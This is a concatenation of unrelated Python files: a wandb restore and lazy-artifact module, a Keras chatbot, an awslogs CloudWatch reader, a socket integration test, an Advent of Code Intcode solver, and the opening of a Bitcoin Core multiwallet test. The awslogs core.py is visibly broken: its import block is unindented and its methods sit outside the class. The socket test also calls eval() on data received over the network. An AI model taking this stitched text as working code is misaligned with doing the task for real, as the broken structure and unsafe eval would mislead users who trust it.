@staticmethod
def _footer_version_check_info(
    check_version: Optional["CheckVersionResponse"] = None,
    quiet: Optional[bool] = None,
    *,
    settings: "Settings",
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """At run end, repeat delete/yank warnings; upgrade hint only if package is bad."""
    if not check_version:
        return
    if settings._offline:
        return
    if (quiet or settings.quiet) or settings.silent:
        return
    # printer = printer or get_printer(settings._jupyter)
    if check_version.delete_message:
        printer.display(check_version.delete_message, status="error")
    elif check_version.yank_message:
        printer.display(check_version.yank_message, status="warn")
    # only display upgrade message if packages are bad
    package_problem = check_version.delete_message or check_version.yank_message
    if package_problem and check_version.upgrade_message:
        printer.display(check_version.upgrade_message)
@staticmethod
def _footer_reporter_warn_err(
    reporter: Optional[Reporter] = None,
    quiet: Optional[bool] = None,
    *,
    settings: "Settings",
    printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
    """Print accumulated reporter warnings and errors, truncated with a hint."""
    if (quiet or settings.quiet) or settings.silent:
        return
    if not reporter:
        return
    # printer = printer or get_printer(settings._jupyter)
    warning_lines = reporter.warning_lines
    if warning_lines:
        warnings = ["Warnings:"] + [f"{line}" for line in warning_lines]
        # The reporter keeps only a sample of lines; signal when truncated.
        if len(warning_lines) < reporter.warning_count:
            warnings.append("More warnings...")
        printer.display(warnings)
    error_lines = reporter.error_lines
    if error_lines:
        errors = ["Errors:"] + [f"{line}" for line in error_lines]
        if len(error_lines) < reporter.error_count:
            errors.append("More errors...")
        printer.display(errors)
# We define this outside of the run context to support restoring before init
def restore(
    name: str,
    run_path: Optional[str] = None,
    replace: bool = False,
    root: Optional[str] = None,
) -> Union[None, TextIO]:
    """Downloads the specified file from cloud storage.

    File is placed into the current directory or run directory.
    By default will only download the file if it doesn't already exist.

    Arguments:
        name: the name of the file
        run_path: optional path to a run to pull files from, i.e. `username/project_name/run_id`
            if wandb.init has not been called, this is required.
        replace: whether to download the file even if it already exists locally
        root: the directory to download the file to.  Defaults to the current
            directory or the run directory if wandb.init was called.

    Returns:
        None if it can't find the file, otherwise a file object open for reading

    Raises:
        wandb.CommError: if we can't connect to the wandb backend
        ValueError: if the file is not found or can't find run_path
    """
    # A "disabled" run behaves as if there were no active run at all.
    is_disabled = wandb.run is not None and wandb.run.disabled
    run = None if is_disabled else wandb.run
    if run_path is None:
        if run is not None:
            run_path = run.path
        else:
            raise ValueError(
                "run_path required when calling wandb.restore before wandb.init"
            )
    if root is None:
        if run is not None:
            root = run.dir
    api = public.Api()
    api_run = api.run(run_path)
    if root is None:
        root = os.getcwd()
    path = os.path.join(root, name)
    # Reuse an existing local copy unless replace=True was requested.
    # NOTE(review): returns an open file handle — the caller owns closing it.
    if os.path.exists(path) and replace is False:
        return open(path, "r")
    if is_disabled:
        return None
    files = api_run.files([name])
    if len(files) == 0:
        return None
    # if the file does not exist, the file has an md5 of 0
    if files[0].md5 == "0":
        raise ValueError("File {} not found in {}.".format(name, run_path or root))
    return files[0].download(root=root, replace=True)
# propagate our doc string to the runs restore method
try:
    Run.restore.__doc__ = restore.__doc__
# py2 doesn't let us set a doc string, just pass
except AttributeError:
    pass
def finish(exit_code: int = None, quiet: bool = None) -> None:
    """Marks a run as finished, and finishes uploading all data.

    This is used when creating multiple runs in the same process.
    We automatically call this method when your script exits.

    Arguments:
        exit_code: Set to something other than 0 to mark a run as failed
        quiet: Set to true to minimize log output
    """
    # No-op when there is no active run.
    if wandb.run:
        wandb.run.finish(exit_code=exit_code, quiet=quiet)


# NOTE(review): a second, byte-identical `Run.restore.__doc__ = restore.__doc__`
# try/except block previously followed this function; it duplicated the one
# directly after restore() and has been removed (the assignment is idempotent,
# so dropping the duplicate is behavior-preserving).
class _LazyArtifact(ArtifactInterface):
    """Deferred handle to a logged artifact.

    Wraps the future returned by `communicate_artifact`; `wait()` resolves
    it into a real public `Artifact`, and every property simply proxies to
    that resolved instance (raising if `wait()` has not been called yet).
    """

    _api: PublicApi
    _instance: Optional[ArtifactInterface] = None
    _future: Any

    def __init__(self, api: PublicApi, future: Any):
        self._api = api
        self._future = future

    def _assert_instance(self) -> ArtifactInterface:
        # Guard used by every proxied attribute: resolution must have happened.
        if not self._instance:
            raise ValueError(
                "Must call wait() before accessing logged artifact properties"
            )
        return self._instance

    def __getattr__(self, item: str) -> Any:
        # Fallback for attributes not defined here: proxy to the resolved
        # instance (only reached when normal lookup fails).
        self._assert_instance()
        return getattr(self._instance, item)

    def wait(self) -> ArtifactInterface:
        """Block on the backend response and resolve the real Artifact."""
        if not self._instance:
            resp = self._future.get().response.log_artifact_response
            if resp.error_message:
                raise ValueError(resp.error_message)
            self._instance = public.Artifact.from_id(resp.artifact_id, self._api.client)
        assert isinstance(
            self._instance, ArtifactInterface
        ), "Insufficient permissions to fetch Artifact with id {} from {}".format(
            resp.artifact_id, self._api.client.app_url
        )
        return self._instance

    # --- simple proxies to the resolved artifact -------------------------

    @property
    def id(self) -> Optional[str]:
        return self._assert_instance().id

    @property
    def version(self) -> str:
        return self._assert_instance().version

    @property
    def name(self) -> str:
        return self._assert_instance().name

    @property
    def type(self) -> str:
        return self._assert_instance().type

    @property
    def entity(self) -> str:
        return self._assert_instance().entity

    @property
    def project(self) -> str:
        return self._assert_instance().project

    @property
    def manifest(self) -> "ArtifactManifest":
        return self._assert_instance().manifest

    @property
    def digest(self) -> str:
        return self._assert_instance().digest

    @property
    def state(self) -> str:
        return self._assert_instance().state

    @property
    def size(self) -> int:
        return self._assert_instance().size

    @property
    def commit_hash(self) -> str:
        return self._assert_instance().commit_hash

    @property
    def description(self) -> Optional[str]:
        return self._assert_instance().description

    @description.setter
    def description(self, desc: Optional[str]) -> None:
        self._assert_instance().description = desc

    @property
    def metadata(self) -> dict:
        return self._assert_instance().metadata

    @metadata.setter
    def metadata(self, metadata: dict) -> None:
        self._assert_instance().metadata = metadata

    @property
    def aliases(self) -> List[str]:
        return self._assert_instance().aliases

    @aliases.setter
    def aliases(self, aliases: List[str]) -> None:
        self._assert_instance().aliases = aliases

    def used_by(self) -> List["wandb.apis.public.Run"]:
        return self._assert_instance().used_by()

    def logged_by(self) -> "wandb.apis.public.Run":
        return self._assert_instance().logged_by()

    # Commenting this block out since this code is unreachable since LocalArtifact
    # overrides them and therefore untestable.
    # Leaving behind as we may want to support these in the future.

    # def new_file(self, name: str, mode: str = "w") -> Any:  # TODO: Refine Type
    #     return self._assert_instance().new_file(name, mode)

    # def add_file(
    #     self,
    #     local_path: str,
    #     name: Optional[str] = None,
    #     is_tmp: Optional[bool] = False,
    # ) -> Any:  # TODO: Refine Type
    #     return self._assert_instance().add_file(local_path, name, is_tmp)

    # def add_dir(self, local_path: str, name: Optional[str] = None) -> None:
    #     return self._assert_instance().add_dir(local_path, name)

    # def add_reference(
    #     self,
    #     uri: Union["ArtifactEntry", str],
    #     name: Optional[str] = None,
    #     checksum: bool = True,
    #     max_objects: Optional[int] = None,
    # ) -> Any:  # TODO: Refine Type
    #     return self._assert_instance().add_reference(uri, name, checksum, max_objects)

    # def add(self, obj: "WBValue", name: str) -> Any:  # TODO: Refine Type
    #     return self._assert_instance().add(obj, name)

    def get_path(self, name: str) -> "ArtifactEntry":
        return self._assert_instance().get_path(name)

    def get(self, name: str) -> "WBValue":
        return self._assert_instance().get(name)

    def download(self, root: Optional[str] = None, recursive: bool = False) -> str:
        return self._assert_instance().download(root, recursive)

    def checkout(self, root: Optional[str] = None) -> str:
        return self._assert_instance().checkout(root)

    def verify(self, root: Optional[str] = None) -> Any:
        return self._assert_instance().verify(root)

    def save(self) -> None:
        return self._assert_instance().save()

    def delete(self) -> None:
        return self._assert_instance().delete()
|
main.py
|
# encoding: utf-8
# Main program and I/O live here.  (Python 2 / old Keras 1.x API.)
from numpy import *
from utils.tools import loadvoc
from keras.models import Sequential,load_model,Model
from keras.layers import Input, Embedding, LSTM, Dense, merge, RepeatVector,TimeDistributed,Masking
from keras.optimizers import SGD,Adam
from keras.utils.np_utils import to_categorical
import threading
import time

# Lock guarding the shared conversation buffers across the two threads.
rlock = threading.RLock()

# Character encode/decode tables (hard-coded keyboard charset; the
# loadvoc()-based vocabulary is disabled below).
#i2c, c2i = loadvoc()
ss="1234567890-=qwertyuiopasdfghjkl;'zxcvbnm,."
i2c={}  # index -> character
c2i={}  # character -> index
for i in range(len(ss)):
    i2c[i]=ss[i]
    c2i[ss[i]]=i

# Model parameters.
VOC = len(i2c)  # vocabulary size
SEN = 20  # maximum sentence length (characters)
INPUT=['','']  # shared buffer: [latest sentence, previous sentence]
SPEAK_OUTPUT=''  # shared buffer for the generated reply
# Encode a sentence into a fixed-length row vector of character indices.
def s2i(s, l=SEN):
    """Return a 1 x l int32 array of char indices; unknown chars map to 0,
    and the tail beyond len(s) stays zero-padded."""
    idx = zeros([1, l], dtype=int32)
    for pos, ch in enumerate(s[:l]):
        idx[0, pos] = c2i.get(ch, 0)
    return idx
def i2s(idx):
    """Decode a 1 x N index array back into a string, skipping 0 (padding).

    Bug fix: the original body did ``s.join(i2c.get(i, ''))`` and discarded
    the result — str.join returns a new string and never mutates ``s`` — so
    the function always returned ''.  Characters are now actually
    accumulated and joined.
    """
    chars = []
    for i in idx[0, :]:
        if i > 0:  # index 0 is padding/unknown
            chars.append(i2c.get(i, ''))
    return ''.join(chars)
# Main model definition.
# Input layer: a sentence as a sequence of character indices.
main_input = Input(shape=(SEN,), dtype='int32', name='main_input')
# Character vectorization: mask 0 (padding), then embed into VOC dims.
x = Masking(mask_value=0)(main_input)
x = Embedding(output_dim=VOC, input_dim=VOC, input_length=SEN)(x)
# Long short-term memory layer.
lstm_out = LSTM(128)(x)
# "Biological clock": current time [hour, minute] as a second input.
time_input = Input(shape=(2,), name='time_input')
# Clock activation.
time_out = Dense(128, activation='sigmoid')(time_input)
# The clock acts as a multiplicative gate on the LSTM output.
x = merge([lstm_out, time_out], mode='mul')
# Deeper "language logic" network.
x = Dense(128, activation='relu')(x)
# Sequence output: repeat the state SEN times, emit one character
# distribution per time step.
x = RepeatVector(SEN)(x)
speak_output = TimeDistributed(Dense(VOC, activation='sigmoid'),name='speak_output')(x)
#speak_output = LSTM(VOC,activation='softmax', name='speak_output',return_sequences=True)(x)
# Model wrapper (functional model wrapped in a Sequential container).
model = Sequential()
model.add(Model(input=[main_input, time_input], output=speak_output))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
# Training loop control flag (set truthy by say() to stop both threads).
POWER_OFF = False
def run():
    """Background loop: train on the conversation buffer and generate a reply."""
    global INPUT,SPEAK_OUTPUT,POWER_OFF
    while not POWER_OFF:
        # When the user has said nothing, feed the model its own last
        # output (self-talk), shifting the buffer under the lock.
        if len(INPUT[0]) == 0:
            with rlock:
                INPUT[1] = INPUT[0]
                INPUT[0] = SPEAK_OUTPUT
        X = s2i(INPUT[1])
        Y = s2i(INPUT[0])
        # Read the current system time as the "biological clock" input.
        tm = time.localtime()
        TIME_INPUT = asarray([[tm.tm_hour,tm.tm_min]],dtype=int32)
        # NOTE(review): Y above is immediately overwritten here, and the
        # one-hot target is built from X (the previous sentence), not from
        # s2i(INPUT[0]) — confirm whether that is intended.
        Y=zeros([1,SEN,VOC],dtype=int32)
        Y[0]=to_categorical(X[0],VOC)
        model.fit([X, TIME_INPUT],Y,
            nb_epoch=1, batch_size=1,verbose=0)
        SPEAK_OUTPUT=i2s(model.predict_classes([X,TIME_INPUT],verbose=0))
        if len(SPEAK_OUTPUT)>0:
            print('A: '+SPEAK_OUTPUT)
        time.sleep(1)
def say():
    """Console loop: read user input; the literal 'end' shuts everything down."""
    global INPUT,SPEAK_OUTPUT,POWER_OFF
    while not POWER_OFF:
        # raw_input: this script targets Python 2.
        a=raw_input('Q: ')
        if a == u'end':
            # Any truthy value stops both loops (here the string 'end').
            POWER_OFF = a
        else:
            # Shift the conversation buffer: previous input moves to slot 1.
            INPUT[1] = INPUT[0]
            INPUT[0] = a
# Start the trainer/speaker and the console reader as daemonless threads.
threading.Thread(target = run, args = (), name = 'run').start()
threading.Thread(target = say, args = (), name = 'say').start()
|
core.py
|
import re
import sys
import os
import time
from threading import Thread, Event
from datetime import datetime, timedelta
from collections import deque
try:
from Queue import Queue
except ImportError:
from queue import Queue
import boto3
from botocore.compat import total_seconds
from termcolor import colored
from dateutil.parser import parse
from . import exceptions
__version__ = '0.3.0'
def milis2iso(milis):
    """Convert epoch milliseconds to an ISO-8601 UTC string with exactly
    millisecond precision, e.g. ``1970-01-01T00:00:00.000Z``."""
    stamp = datetime.utcfromtimestamp(milis / 1000.0)
    # Pad with ".000" so timestamps without microseconds still carry a
    # fraction, then truncate to 23 chars (date + time + .mmm).
    padded = stamp.isoformat() + ".000"
    return padded[:23] + 'Z'
class AWSLogs(object):
    """Reads and streams CloudWatch Logs events (awslogs core)."""

    # Stream state flags (presumably consumed by stream-tracking code
    # outside this view — confirm).
    ACTIVE = 1
    EXHAUSTED = 2
    # Seconds to sleep between polls in watch mode — usage not in view.
    WATCH_SLEEP = 2
    # filter_log_events accepts at most this many stream names per call.
    FILTER_LOG_EVENTS_STREAMS_LIMIT = 100
    # Size of the dedup window for interleaved responses.
    MAX_EVENTS_PER_CALL = 10000
    # Sentinel meaning "match every group/stream".
    ALL_WILDCARD = 'ALL'
def __init__(self, **kwargs):
    """Capture CLI options and build the boto3 CloudWatch Logs client.

    kwargs mirror the awslogs command-line flags: region/credentials,
    group and stream names, filter pattern, watch mode, output-column
    toggles, and start/end time expressions.
    """
    self.aws_region = kwargs.get('aws_region')
    self.aws_access_key_id = kwargs.get('aws_access_key_id')
    self.aws_secret_access_key = kwargs.get('aws_secret_access_key')
    self.aws_session_token = kwargs.get('aws_session_token')
    self.log_group_name = kwargs.get('log_group_name')
    self.log_stream_name = kwargs.get('log_stream_name')
    self.filter_pattern = kwargs.get('filter_pattern')
    self.watch = kwargs.get('watch')
    self.color_enabled = kwargs.get('color_enabled')
    self.output_stream_enabled = kwargs.get('output_stream_enabled')
    self.output_group_enabled = kwargs.get('output_group_enabled')
    self.output_timestamp_enabled = kwargs.get('output_timestamp_enabled')
    self.output_ingestion_time_enabled = kwargs.get(
        'output_ingestion_time_enabled')
    # parse_datetime (defined elsewhere in this class) converts the
    # human-readable start/end expressions to epoch milliseconds.
    self.start = self.parse_datetime(kwargs.get('start'))
    self.end = self.parse_datetime(kwargs.get('end'))
    self.client = boto3.client(
        'logs',
        aws_access_key_id=self.aws_access_key_id,
        aws_secret_access_key=self.aws_secret_access_key,
        aws_session_token=self.aws_session_token,
        region_name=self.aws_region
    )
def _get_streams_from_pattern(self, group, pattern):
    """Yield stream names in ``group`` whose names match ``pattern``
    (anchored at the start; the ALL wildcard matches everything)."""
    regex_source = '.*' if pattern == self.ALL_WILDCARD else pattern
    matcher = re.compile('^{0}'.format(regex_source))
    for candidate in self.get_streams(group):
        if matcher.match(candidate):
            yield candidate
def list_logs(self):
    """Stream matching CloudWatch log events to stdout.

    Resolves the requested streams, then runs a producer thread
    (``generator``) that pulls events from the API and a consumer
    thread (``consumer``) that formats and prints them, until the
    stream is exhausted — or forever when ``watch`` is set.
    """
    streams = []
    if self.log_stream_name != self.ALL_WILDCARD:
        # Resolve the stream-name pattern up front; filter_log_events
        # only accepts a bounded number of explicit stream names.
        streams = list(self._get_streams_from_pattern(self.log_group_name, self.log_stream_name))
        if len(streams) > self.FILTER_LOG_EVENTS_STREAMS_LIMIT:
            raise exceptions.TooManyStreamsFilteredError(
                self.log_stream_name,
                len(streams),
                self.FILTER_LOG_EVENTS_STREAMS_LIMIT
            )

    # Column width for the stream name; 10 is an arbitrary fallback
    # when no explicit streams were resolved.
    max_stream_length = max([len(s) for s in streams]) if streams else 10
    group_length = len(self.log_group_name)

    # Producer/consumer pair: `queue` carries events, `exit` signals
    # termination in both directions.  NOTE: `exit` and `queue` shadow
    # the builtin / stdlib module names inside this function.
    queue, exit = Queue(), Event()

    # Note: filter_log_events paginator is broken
    # ! Error during pagination: The same next token was received twice

    def consumer():
        # Format and print events until the None sentinel arrives.
        while not exit.is_set():
            event = queue.get()

            if event is None:
                exit.set()
                break

            output = []
            if self.output_group_enabled:
                output.append(
                    self.color(
                        self.log_group_name.ljust(group_length, ' '),
                        'green'
                    )
                )
            if self.output_stream_enabled:
                output.append(
                    self.color(
                        event['logStreamName'].ljust(max_stream_length,
                                                     ' '),
                        'cyan'
                    )
                )
            if self.output_timestamp_enabled:
                output.append(
                    self.color(
                        milis2iso(event['timestamp']),
                        'yellow'
                    )
                )
            if self.output_ingestion_time_enabled:
                output.append(
                    self.color(
                        milis2iso(event['ingestionTime']),
                        'blue'
                    )
                )
            output.append(event['message'])
            print(' '.join(output))

    def generator():
        """Push events into queue trying to deduplicate them using a lru queue.
        AWS API stands for the interleaved parameter that:
            interleaved (boolean) -- If provided, the API will make a best
            effort to provide responses that contain events from multiple
            log streams within the log group interleaved in a single
            response. That makes some responses return some subsequent
            response duplicate events. In a similar way when awslogs is
            called with --watch option, we need to findout which events we
            have alredy put in the queue in order to not do it several
            times while waiting for new ones and reusing the same
            next_token. The site of this queue is MAX_EVENTS_PER_CALL in
            order to not exhaust the memory.
        """
        interleaving_sanity = deque(maxlen=self.MAX_EVENTS_PER_CALL)
        kwargs = {'logGroupName': self.log_group_name,
                  'interleaved': True}

        if streams:
            kwargs['logStreamNames'] = streams

        if self.start:
            kwargs['startTime'] = self.start

        if self.end:
            kwargs['endTime'] = self.end

        if self.filter_pattern:
            kwargs['filterPattern'] = self.filter_pattern

        while not exit.is_set():
            response = self.client.filter_log_events(**kwargs)

            for event in response.get('events', []):
                # Skip events already emitted from a previous page.
                if event['eventId'] not in interleaving_sanity:
                    interleaving_sanity.append(event['eventId'])
                    queue.put(event)

            if 'nextToken' in response:
                kwargs['nextToken'] = response['nextToken']
            else:
                if self.watch:
                    # Tailing: poll again with the same token shortly.
                    time.sleep(1)
                else:
                    # Done: wake the consumer with the sentinel.
                    queue.put(None)
                    break

    g = Thread(target=generator)
    g.start()

    c = Thread(target=consumer)
    c.start()

    try:
        while not exit.is_set():
            time.sleep(.1)
    except (KeyboardInterrupt, SystemExit):
        exit.set()
        print('Closing...\n')
        # Hard exit: worker threads may be blocked on queue.get()/API
        # calls and cannot be joined cleanly.
        os._exit(0)
def list_groups(self):
    """Print the name of every available CloudWatch Logs group."""
    for group_name in self.get_groups():
        print(group_name)
def list_streams(self):
    """Print every available stream name in ``log_group_name``."""
    for stream_name in self.get_streams():
        print(stream_name)
def get_groups(self):
    """Yield the name of every available CloudWatch Logs group."""
    pages = self.client.get_paginator('describe_log_groups').paginate()
    for page in pages:
        for group in page.get('logGroups', []):
            yield group['logGroupName']
def get_streams(self, log_group_name=None):
    """Yield stream names in *log_group_name* (default: the configured
    group) whose event range overlaps the [start, end] time window.

    Streams carrying no ``firstEventTimestamp`` are explicit streams
    with no indexed events yet and are always yielded.
    """
    kwargs = {'logGroupName': log_group_name or self.log_group_name}
    window_start = self.start or 0
    window_end = self.end or sys.float_info.max
    paginator = self.client.get_paginator('describe_log_streams')
    for page in paginator.paginate(**kwargs):
        for stream in page.get('logStreams', []):
            if 'firstEventTimestamp' not in stream:
                # This is a specified log stream rather than a filter on
                # the whole log group, so there's no firstEventTimestamp.
                yield stream['logStreamName']
                continue
            overlap_lo = max(stream['firstEventTimestamp'], window_start)
            overlap_hi = min(stream['lastEventTimestamp'], window_end)
            if overlap_lo <= overlap_hi:
                yield stream['logStreamName']
def color(self, text, color):
    """Return *text* wrapped in ANSI *color* codes when coloring is
    enabled; otherwise return it unchanged."""
    return colored(text, color) if self.color_enabled else text
def parse_datetime(self, datetime_text):
    """Convert *datetime_text* into epoch milliseconds.

    Accepts a relative expression such as ``"5 minutes ago"`` /
    ``"2 weeks"`` or any absolute date understood by dateutil's
    ``parse``.  Returns ``None`` for falsy input.

    Raises:
        exceptions.UnknownDateError: if the text cannot be parsed.
    """
    if not datetime_text:
        return None
    # "<amount> <unit> [ago]" relative form.  Only the first letter of
    # the unit is significant below; the long forms document intent.
    # Fix: the alternation previously read 'w|weeks|weeks' — the
    # singular 'week' was missing (duplicated 'weeks' typo).
    ago_regexp = r'(\d+)\s?(m|minute|minutes|h|hour|hours|d|day|days|w|week|weeks)(?: ago)?'
    ago_match = re.match(ago_regexp, datetime_text)
    if ago_match:
        amount, unit = ago_match.groups()
        amount = int(amount)
        # Seconds per unit, keyed by the unit's first letter.
        unit = {'m': 60, 'h': 3600, 'd': 86400, 'w': 604800}[unit[0]]
        date = datetime.utcnow() + timedelta(seconds=unit * amount * -1)
    else:
        try:
            date = parse(datetime_text)
        except ValueError:
            raise exceptions.UnknownDateError(datetime_text)
    # Milliseconds since the Unix epoch, as the CloudWatch API expects.
    return int(total_seconds(date - datetime(1970, 1, 1))) * 1000
|
integrationtestSocket.py
|
#!/usr/bin/env python3
import unittest
import sys
import threading
import queue
import time
from socket import AF_INET, SOCK_STREAM
from geosquizzy.gs_socket.gs_client import GsSocketClient
from geosquizzy.gs_socket.gs_server import GsSocketServer
from geosquizzy.geosquizzy import GeoSquizzy
from tests.getdata import get_geojson
class SocketClientServerConnectionTest(unittest.TestCase):
    """
    Testing interactions between server/clients during geosquizzy algorithm execution
    """

    def setUp(self):
        # Shared socket configuration for the test server and both clients.
        self.socket_options = {'HOST': 'localhost',
                               'PORT': 8030,
                               'FAMILY': AF_INET,
                               'TYPE': SOCK_STREAM,
                               'CONNECTIONS': 2}
        self.socket_client = GsSocketClient(**self.socket_options)
        self.socket_server = GsSocketServer(**self.socket_options)
        self.geojson_options = {'geojson_options': {'mode': 'static', 'geojson_type': 'FeatureCollection'},
                                'outcome_options': {},
                                'optim': {'batch': 1, 'loss': -5.0},
                                'socket_options': self.socket_options
                                }
        # NOTE(review): hard-coded absolute path — this fixture only loads
        # on the original author's machine; should come from config/env.
        self.data = get_geojson(path="/home/ing/PycharmProjects/geo-squizzy/"
                                     "geosquizzy/build_big_data/data/dump1000.json")

    def tearDown(self):
        pass

    def test_geosquizzy_sockets(self):
        """
        It testing listening to messages broadcasted by socket server(which receive it from geosquizzy algorithm
        client) by another client
        """
        # Starting server thread
        self.socket_server.create_connection()
        server_thread = threading.Thread(target=self.socket_server.run)
        server_thread.daemon = True
        server_thread.start()

        second_client_data = queue.Queue()

        def second_client_listen(client, q):
            # Reads broadcast chunks until the server closes the
            # connection (empty read terminates the loop).
            while True:
                data = client.read(1024)
                if data:
                    q.put(str(data, 'utf-8'))
                    # NOTE(review): task_done() immediately after put()
                    # (without a matching get()) makes q.join() a no-op
                    # for this item — confirm this is intentional.
                    q.task_done()
                else:
                    break
                time.sleep(0.5)

        # Starting second client thread
        self.socket_client.connect()
        second_client_thread = threading.Thread(target=second_client_listen,
                                                args=(self.socket_client, second_client_data))
        second_client_thread.start()

        # Starting geosquizzy socket client and algorithm execution
        self.geosquizzy = GeoSquizzy(**self.geojson_options)
        self.geosquizzy.start(geojson=self.data)
        # self.socket_client.disconnect()
        time.sleep(0.5)
        self.socket_client.disconnect()

        # Waiting for second_client to receive all data
        second_client_thread.join()
        # Waiting for second_client data
        second_client_data.join()

        # Getting second client
        second_client_res = []
        while True:
            if not second_client_data.empty():
                val = second_client_data.get()
                if bool(val):
                    # NOTE(review): eval() on data received over a socket
                    # is unsafe; acceptable only because the peer is this
                    # test's own trusted local server.
                    val = eval(val)
                    second_client_res = second_client_res + val
            else:
                break

        # Getting geosquizzy result
        geosquizzy_res = self.geosquizzy.get_results()

        # Compare test
        org_len = len(geosquizzy_res)
        sock_len = 0
        for x in geosquizzy_res:
            for y in second_client_res:
                if y['keys'] == x['keys']:
                    sock_len += 1
                    break
        # [print(x, '\n') for x in geosquizzy_res]
        # [print(x, '\n') for x in second_client_res]
        # TODO difference is with one key, which is gathered after leaving features array
        self.assertTrue(org_len-1 == sock_len)
def test_suite():
    """Collect every TestCase defined in this module into a suite."""
    this_module = sys.modules[__name__]
    return unittest.findTestCases(this_module)


if __name__ == '__main__':
    unittest.main(defaultTest='test_suite')
|
part2.py
|
import threading
import time
from itertools import permutations
class AmplifierController:
    """Advent of Code 2019 day 7 (part 2): amplifier feedback loop.

    Five Intcode interpreters run the same program concurrently, one
    thread each; amplifier ``i`` reads inputs from ``self.queues[i]``
    and writes outputs to ``self.queues[(i + 1) % 5]``, so the last
    amplifier feeds back into the first.
    """

    def get_value(self, index, mode, program):
        """Resolve the operand at *index*: mode '0' is position mode
        (follow the pointer); any other mode reads the cell directly."""
        if mode == "0":
            return program[program[index]]
        return program[index]

    def run_program(self, program, I):
        """Interpret *program* for amplifier *I* until opcode 99 halts.

        On halt, the next amplifier's queue (which holds this
        amplifier's final outputs) is stored in ``self.outputs[I]``.
        """
        i = 0
        while i < len(program):
            # Reverse and zero-pad the instruction so opcode[:2] is the
            # (reversed) two-digit opcode and opcode[2:5] the param modes.
            opcode = str(program[i])[::-1] + '0' * (5 - len(str(program[i])))
            op = int(opcode[:2][::-1])  # parse the opcode once per instruction
            if op == 99:  # halt
                self.outputs[I] = self.queues[(I + 1) % 5]
                return
            elif op == 1:  # add
                program[program[i + 3]] = self.get_value(i + 1, opcode[2], program) + self.get_value(i + 2, opcode[3], program)
                i += 4
            elif op == 2:  # multiply
                program[program[i + 3]] = self.get_value(i + 1, opcode[2], program) * self.get_value(i + 2, opcode[3], program)
                i += 4
            elif op == 3:  # input: busy-wait for the previous amplifier
                while not self.queues[I]:
                    time.sleep(0.0000001)
                program[program[i + 1]] = self.queues[I].pop(0)
                i += 2
            elif op == 4:  # output: push to the next amplifier's queue
                self.queues[(I + 1) % 5].append(self.get_value(i + 1, opcode[2], program))
                i += 2
            elif op == 5:  # jump-if-true
                i = self.get_value(i + 2, opcode[3], program) if self.get_value(i + 1, opcode[2], program) != 0 else i + 3
            elif op == 6:  # jump-if-false
                i = self.get_value(i + 2, opcode[3], program) if self.get_value(i + 1, opcode[2], program) == 0 else i + 3
            elif op == 7:  # less-than
                program[program[i + 3]] = 1 if self.get_value(i + 1, opcode[2], program) < self.get_value(i + 2, opcode[3], program) else 0
                i += 4
            elif op == 8:  # equals
                program[program[i + 3]] = 1 if self.get_value(i + 1, opcode[2], program) == self.get_value(i + 2, opcode[3], program) else 0
                i += 4
            else:
                # Bug fix: the original did `raise("Invalid opcode...")`,
                # which raises a TypeError in Python 3 (exceptions must
                # derive from BaseException).  Raise a real exception.
                raise ValueError("Invalid opcode: {}".format(opcode))

    def run_simulation(self, program, phase_settings):
        """Run all five amplifiers on copies of *program* with the given
        phase settings; return the final output of amplifier 4."""
        self.outputs, threads = {}, {}
        # queues[i] starts with amplifier i's phase setting; amplifier 0
        # additionally receives the initial input signal 0.
        self.queues = {i: [x] for i, x in enumerate(phase_settings)}
        self.queues[0].append(0)
        for i in range(5):
            thr = threading.Thread(target=self.run_program, args=(program.copy(), i))
            threads[i] = thr
            thr.start()
        for i in range(5):
            threads[i].join()
        return self.outputs[4][0]

    def main(self, program):
        """Return the highest thruster signal over all permutations of
        phase settings 5..9 for the comma-separated *program* text."""
        program = list(map(int, program.strip().split(",")))
        phase_settings = permutations(range(5, 10), 5)
        return max([self.run_simulation(program.copy(), phase_setting) for phase_setting in phase_settings])
if __name__ == "__main__":
    # Read the comma-separated Intcode program and print the best signal.
    with open("input.txt", "r") as f:
        program = f.read()
    print(AmplifierController().main(program))
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a bitcoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
# Shared flag: set by whichever worker thread first observes the
# "already loading" race error.
got_loading_error = False


def test_load_unload(node, name):
    """Hammer loadwallet/unloadwallet on *name* until some thread hits
    the concurrent-load race, then stop (all threads share the flag)."""
    global got_loading_error
    while not got_loading_error:
        try:
            node.loadwallet(name)
            node.unloadwallet(name)
        except JSONRPCException as e:
            # Only the specific concurrent-load error ends the test;
            # any other JSONRPCException is ignored and we retry.
            if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
                got_loading_error = True
class MultiWalletTest(BitcoinTestFramework):
    """Exercise multiwallet behavior: creating, loading, unloading,
    backing up and restoring multiple wallet files on one node."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 2
        self.rpc_timeout = 120
        self.extra_args = [["-nowallet"], []]

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def add_options(self, parser):
        parser.add_argument(
            '--data_wallets_dir',
            default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
            help='Test data with wallet directories (default: %(default)s)',
        )

    def run_test(self):
        node = self.nodes[0]

        # Path helpers inside node 0's datadir and a per-wallet RPC getter.
        data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
        wallet_dir = lambda *p: data_dir('wallets', *p)
        wallet = lambda name: node.get_wallet_rpc(name)

        def wallet_file(name):
            # Path of the wallet's data file; the default wallet lives in
            # its own subdirectory, other wallets may be a dir or a file.
            if name == self.default_wallet_name:
                return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
            if os.path.isdir(wallet_dir(name)):
                return wallet_dir(name, "wallet.dat")
            return wallet_dir(name)

        assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})

        # check wallet.dat is created
        self.stop_nodes()
        assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)

